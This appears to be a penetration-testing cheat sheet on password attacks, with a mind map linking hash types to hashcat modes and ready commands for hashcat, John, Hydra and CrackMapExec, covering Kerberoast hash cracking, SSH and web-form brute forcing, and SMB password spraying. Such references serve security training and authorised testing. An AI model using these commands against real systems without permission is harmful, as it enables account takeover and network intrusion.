Password Attack Flow
Password cracking methodology
Password AttacksTip: Click on any node to see related information!
Interactive Mind Map
graph TD
A[Password Hash] --> B{Hash Type}
B --> C[MD5 = -m 0]
B --> D[NTLM = -m 1000]
B --> E[SHA512 = -m 1800]
B --> F[Kerberos = -m 13100]
C --> G[Hashcat]
D --> G
E --> G
F --> G
G --> H{Attack Mode}
H --> I[Dictionary]
H --> J[Rules]
H --> K[Mask]
Related Modules
Quick Reference
Hashcat
hashcat -m 0 hash.txt wordlist.txt # Crack MD5 hashes hashcat -m 1000 ntlm.txt rockyou.txt # Crack NTLM hashes hashcat -m 13100 krb5tgs.txt wordlist.txt # Crack Kerberoast TGS hashes
John
john --wordlist=rockyou.txt hash.txt # Crack hashes with John john --show hash.txt # Show cracked passwords
Hydra
hydra -l admin -P wordlist.txt ssh://10.10.10.5 # Brute force SSH hydra -L users.txt -P pass.txt 10.10.10.5 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid" # Brute force web form
CrackMapExec
crackmapexec smb 10.10.10.5 -u user -p password # Test SMB credentials crackmapexec smb 10.10.10.5 -u users.txt -p passwords.txt # Password spray SMB